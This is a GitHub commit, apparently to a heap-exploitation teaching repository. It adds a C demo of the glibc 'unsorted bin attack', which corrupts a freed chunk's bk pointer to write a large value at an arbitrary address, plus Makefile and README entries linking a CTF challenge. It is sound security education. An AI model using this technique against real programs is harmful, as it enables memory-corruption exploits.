Add unsorted bin attack

midoo45 · Sep 29, 2016 · 147a347 · 147a347
1 parent cc28431
commit 147a347
Show file tree

Hide file tree

Showing 3 changed files with 37 additions and 1 deletion.
diff --git a/Makefile b/Makefile
@@ -1,4 +1,4 @@
-PROGRAMS = fastbin_dup fastbin_dup_into_stack unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks house_of_force
+PROGRAMS = fastbin_dup fastbin_dup_into_stack unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks house_of_force unsorted_bin_attack
 CFLAGS += -std=c99
 
 # Convenience to auto-call mcheck before the first malloc()

diff --git a/README.md b/README.md
@@ -14,6 +14,7 @@ We came up with the idea during a hack meeting, and have implemented the followi
 | [house_of_lore.c](house_of_lore.c) | Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist. | |
 | [overlapping_chunks.c](overlapping_chunks.c) | Exploit the overwrite of a freed chunk size in the unsorted bin in order to make a new allocation overlap with an existing chunk | [hack.lu CTF 2015-bookstore](https://github.com/ctfs/write-ups-2015/tree/master/hack-lu-ctf-2015/exploiting/bookstore) |
 | [house_of_force.c](house_of_force.c) | Exploiting the Top Chunk (Wilderness) header in order to get malloc to return a nearly-arbitrary pointer  | [Boston Key Party 2016-cookbook](https://github.com/ctfs/write-ups-2016/tree/master/boston-key-party-2016/pwn/cookbook-6) |
+| [unsorted_bin_attack.c](unsorted_bin_attack.c) | Exploiting the overwrite of a freed chunk on unsorted bin freelist to write a large value into arbitrary address  | [0ctf 2016-zerostorage](https://github.com/ctfs/write-ups-2016/tree/master/0ctf-2016/exploit/zerostorage-6) |
 
 Have a good example?
 Add it here!

diff --git a/unsorted_bin_attack.c b/unsorted_bin_attack.c
@@ -0,0 +1,35 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(){
+	printf("This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
+	printf("In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
+		   "global variable global_max_fast in libc for further fastbin attack\n\n");
+
+	unsigned long stack_var=0;
+	printf("Let's first look at the target we want to rewrite on stack:\n");
+	printf("%p: %ld\n\n", &stack_var, stack_var);
+
+	unsigned long *p=malloc(400);
+	printf("Now, we allocate first normal chunk on the heap at: %p\n",p);
+	printf("And allocate another normal chunk in order to avoid consolidating the top chunk with"
+           "the first one during the free()\n\n"); 
+	malloc(500);
+
+	free(p);
+	printf("We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
+		   "point to %p\n",p[1]);
+
+	//------------VULNERABILITY-----------
+
+	p[1]=(unsigned long)(&stack_var-2);
+	printf("Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
+	printf("And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",p[1]);
+
+	//------------------------------------
+
+	malloc(400);
+	printf("Let's malloc again to get the chunk we just free. During this time, target should has already been "
+		   "rewrite:\n");
+	printf("%p: %p\n", &stack_var, stack_var);
+}